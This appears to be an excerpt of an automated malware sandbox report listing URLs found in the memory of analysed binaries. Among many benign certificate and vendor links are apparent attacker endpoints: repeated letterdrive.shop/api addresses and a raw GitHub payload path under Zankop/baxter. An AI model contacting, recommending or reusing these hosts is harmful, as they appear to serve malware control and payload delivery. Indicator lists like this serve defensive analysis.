                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: _compat.pyc0.55.drString found in binary or memory: http://docs.python.org/3/library/functools.html#functools.lru_cache.
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F2074D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: NzL6O1Q.exe, 0000001E.00000002.2504235326.00000000012BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic5
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmp, pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2541734851.000001F1E2221000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.000000000302A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: db3cab6cee.exe, 00000037.00000003.2778721078.000001E1978C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: pyexpat.pyd.55.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: zjFtdxQ.exe, 0000000C.00000003.2406324189.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.exe, 0000000C.00000003.2406604387.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000000.2407228078.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.innosetup.com/
                          Source: powershell.exe, 00000012.00000002.2797013531.000001F1FA5C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                          Source: zjFtdxQ.exe, 0000000C.00000003.2406324189.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.exe, 0000000C.00000003.2406604387.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000000.2407228078.0000000000401000.00000020.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.remobjects.com/ps
                          Source: NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zealous-roentgen.66-63-187-122.plesk.page
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                          Source: _psosx.pyc.55.drString found in binary or memory: https://arstechnica.com/civis/viewtopic.php?f=19&t=465002.
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: regsvr32.exe, 00000011.00000002.3302250215.00007FFDF6E38000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2339462163.0000026F207F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/Zankop/baxter/raw/refs/heads/master/1027
                          Source: _compat.pyc0.55.drString found in binary or memory: https://github.com/giampaolo/psutil/issues/1659)
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                          Source: NzL6O1Q.exe, 00000014.00000002.3318904370.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 0000001E.00000002.2506834918.0000000003051000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: _legacy.pyc.55.drString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                          Source: e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/
                          Source: e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/1520
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/K0
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/Y
                          Source: e44fda3216.exe, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api
                          Source: e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api$
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api1Sw
                          Source: e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api6
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiMSwhVz
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2789195144.0000000000627000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2772005516.0000000000622000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2465911850.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451466201.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476241959.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiTRy
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiU
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apibu
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apibuR
                          Source: e44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apieDU
                          Source: e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiob
                          Source: e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apip
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apis
                          Source: e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api~
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/mfilJ
                          Source: e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/ppda
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/ppli
                          Source: e44fda3216.exeString found in binary or memory: https://letterdrive.shop:443/api
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop:443/apiQh
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Zankop/baxter/refs/heads/master/1027
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                          Source: e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: e44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
